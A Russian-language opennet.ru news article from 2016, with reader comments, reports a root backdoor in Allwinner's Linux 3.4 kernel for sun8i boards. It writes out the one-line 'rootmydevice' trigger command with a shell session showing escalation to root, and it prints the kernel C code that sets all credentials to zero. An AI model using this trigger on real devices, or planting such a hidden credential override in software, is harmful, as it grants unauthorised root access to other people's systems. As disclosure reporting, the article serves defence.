OpenNews: Бэкдор в отладочном коде модифицированного ядра Linux для систем Allwinner

10.05.2016 11:48 Бэкдор в отладочном коде модифицированного ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".


   $ id
   uid=1000(user) gid=1000(user) 

   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 

   $ id
   uid=0(root) gid=0(root)

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:


        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10.

исправить +16 +/–

Лицензия: CC-BY

Тип: Проблемы безопасности

Ключевые слова: backdoor, allwinner

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение

Ajax/Линейный | Раскрыть все сообщения | RSS

1.1, Аноним (-), 13:04, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	+25 +/–
отладочный режим для АНБ ФСБ КГБ

2.2, Аноним (-), 13:11, 10/05/2016 [^] [ответить] [к модератору]	+/–
короче для всех кроме нас)

3.17, Аноним (-), 15:26, 10/05/2016 [^] [ответить] [к модератору]	+2 +/–
А вы, надо полагать, ЦРУ?

4.21, Аноним (-), 16:17, 10/05/2016 [^] [ответить] [к модератору]	+12 +/–
Нет, ми моссад.

5.46, Fantomas (??), 04:46, 11/05/2016 [^] [ответить] [к модератору]	+1 +/–
Московский сад что ли?

6.47, t28 (?), 09:22, 11/05/2016 [^] [ответить] [к модератору]	+/–
Да.

3.41, Аноним (-), 23:23, 10/05/2016 [^] [ответить] [к модератору]	+/–
> короче для всех кроме нас) А у тебя что, echo не работает?

2.19, Аноним (-), 15:51, 10/05/2016 [^] [ответить] [к модератору]	+1 +/–
ru wikipedia org Совет по национальной безопасности United States National Secu... весь текст скрыт [показать]

2.26, Аноним (-), 17:45, 10/05/2016 [^] [ответить] [к модератору]	+4 +/–
Очень полезная функция на андроиде. Или получение рута через недокументированные "уязвимости" путем запуска подозрительных бинарей лучше?

3.34, Eklykti (?), 19:37, 10/05/2016 [^] [ответить] [к модератору]	+1 +/–
Угу, только ты ставишь «калькулятор» из маркета, а он получает таким образом рута и ставит тебе уже настоящий бэкдор.

4.35, Crazy Alex (ok), 20:20, 10/05/2016 [^] [ответить] [к модератору]	+1 +/–
Если ты хочешь безопасность на андроиде - какой, к лешему, маркет? Опять же - в принципе можно и бинарный патч наложить после этого. Хотя бы просто строку покорёжить.

5.36, РОСКОМУЗОР (?), 21:10, 10/05/2016 [^] [ответить] [к модератору]	+1 +/–
Если ты хочешь безопасность, какой к лешему андроид?

6.37, God (?), 21:38, 10/05/2016 [^] [ответить] [к модератору]	+3 +/–
Если ты хочешь, то какая к лешему безопасность?

6.38, Crazy Alex (ok), 21:48, 10/05/2016 [^] [ответить] [к модератору]	+/–
Самый обычный. Если не надо прятаться от спецслужб и прочих врагов, а всего лишь хочется не иметь вирусни - f-droid вместо непонятного софта из маркета и всё будет в порядке.

2.39, vitalif (ok), 21:49, 10/05/2016 [^] [ответить] [к модератору]	+/–
Не, на андроиде маст хэв!

1.6, Аноним (-), 13:42, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	+5 +/–
Это не баг, это фича!

1.8, бедный буратино (ok), 14:01, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	–1 +/–
пойду свой armbian проверю

2.42, Аноним (-), 23:25, 10/05/2016 [^] [ответить] [к модератору]	–1 +/–
> пойду свой armbian проверю Не надо всякие бэкдорианы ставить и вендорские ядра. Только майнлайн, только дебиан, только хардкор.

1.11, Аноним as anon (?), 14:35, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	–3 +/–
К андроиду данная новость не имеет никакого отношения. Если ни разу не видели что такое банана-пи и прочие линуксовые SOC, то просто переводите исходник новости без собственных пубертатных фантазий.

2.14, p5n (ok), 14:51, 10/05/2016 [^] [ответить] [к модератору]	+3 +/–
Например cubieboard идёт с прошитым андроидом И есть планшеты на allwinner есте... весь текст скрыт [показать]

3.27, Аноним (-), 17:47, 10/05/2016 [^] [ответить] [к модератору]	+1 +/–
Только надо пароль рута потом сразу создавать, т е это должно сразу предлагаться... весь текст скрыт [показать]

3.43, Аноним (-), 23:26, 10/05/2016 [^] [ответить] [к модератору]	+/–
> Например cubieboard идёт с прошитым андроидом. У SD-карты приоритет. А у некоторых allwinner вообще только загрузка с карты и есть.

1.13, Аноним (-), 14:48, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	+/–
Может стоит написать в новости кто же этот герой, добавивший бэкдор?

2.15, p5n (ok), 14:52, 10/05/2016 [^] [ответить] [к модератору]	+1 +/–
> Может стоит написать в новости кто же этот герой, добавивший бэкдор? Врядли компания Allwinner это расскажет. Речь о их форке ядра.

1.23, Аноним (-), 16:54, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	+/–
echo rootmydevice proc sunxi_debug sunxi_debug -bash proc sunxi_debug s... весь текст скрыт [показать]

2.24, Аноним (-), 16:56, 10/05/2016 [^] [ответить] [к модератору]	+/–
а, там только для арм8. посыпаю голову пеплом :}

3.28, anonymous (??), 18:25, 10/05/2016 [^] [ответить] [к модератору]	+/–
sun8i - это armv7 orangepi OrangePI uname -a Linux OrangePI 3 4 39 2 SMP PRE... весь текст скрыт [показать]

1.25, Аноним (-), 17:06, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	–3 +/–
тот самый случай, когда proc не в прок

2.44, Аноним (-), 23:28, 10/05/2016 [^] [ответить] [к модератору]	–1 +/–
> тот самый случай, когда proc не в прок Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено в системе?

3.54, Аноним (-), 23:38, 11/05/2016 [^] [ответить] [к модератору]	+/–
>> тот самый случай, когда proc не в прок > Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено > в системе? Ныхрены это смотреть на _отлаженной_ системе?

1.29, anonimus (?), 18:27, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	+4 +/–
Строка 'cred->euid = 0;' написана 2 раза Надо челу, рекламирующиему статический анализатор с блюющим единорогом, проверить алвинеровские бекдоры и запилить статью на хабр с объяснениями как испраить баги и ссылкой на англоязычный перевод.

2.30, тоже Аноним (ok), 18:35, 10/05/2016 [^] [ответить] [к модератору]	+1 +/–
Если их статический анализатор начнет еще и бэкдоры выявлять, имиджевому единорогу придется не только блевать радугой, но и какать бабочками. Но пока, насколько мне известно, ему это не грозит.

3.32, anonimus (?), 18:44, 10/05/2016 [^] [ответить] [к модератору]	+/–
Не выявлять бекдоры, а хотя бы писать их так, чтобы они во время своей паразитно... весь текст скрыт [показать]

2.31, anonimus (?), 18:38, 10/05/2016 [^] [ответить] [к модератору]	–1 +/–
да и код сравнения строк с strncmp написан неаккуратненько. Надо бы сначала убедиться что count >= 12 (еще лучше, просто == 12) и лишь затем вызывать strncmp(..., 12)

3.33, Аноним (-), 19:25, 10/05/2016 [^] [ответить] [к модератору]	+3 +/–
А смысл? Вернет значение больше нуля да и ладно

3.51, alex (??), 17:37, 11/05/2016 [^] [ответить] [к модератору]	+/–
count - это типа сначала длину строки в буфере проверить? дак сравнение точно также пройдётся по нему проблема может возникнуть только если буфер меньше 12+1 байт и при этом в нём нет нулевого байта, но тогда и длину не получится определить корректно.

1.40, chinarulezzz (ok), 22:27, 10/05/2016 [ответить] [показать ветку] [···] [к модератору]	+/–
> предлагаемое компанией Allwinner к перцам нужно внимательней относиться)

2.45, Аноним (-), 23:57, 10/05/2016 [^] [ответить] [к модератору]

+/–

>> предлагаемое компанией Allwinner
> к перцам нужно внимательней относиться)

У них там все драйверы такие. Где дебаг, где просто баг. Пользуйтесь майнлайном.

1.48, IZh. (?), 11:56, 11/05/2016 [ответить] [показать ветку] [···] [к модератору]	+/–
> cred->uid = 0; > ... А RCU для кого писано? Вот тут точно статические анализаторы могли бы warning выдавать.

1.52, Аноним (-), 17:50, 11/05/2016 [ответить] [показать ветку] [···] [к модератору]	+/–
Э "Бэкдор позиционируется как отладочный ре" типа уже позиционируется малварь легальный можно писать и грабить что ле?

1.53, Аноним (-), 17:53, 11/05/2016 [ответить] [показать ветку] [···] [к модератору]	–1 +/–
такая спокойная беседа о бэкдоре

2.55, Аноним (-), 23:39, 11/05/2016 [^] [ответить] [к модератору]	+/–
Так они повсюду Чтобы не понтоваться - надо выкинуть девайся и к староверам, в ... весь текст скрыт [показать]

Добавить комментарий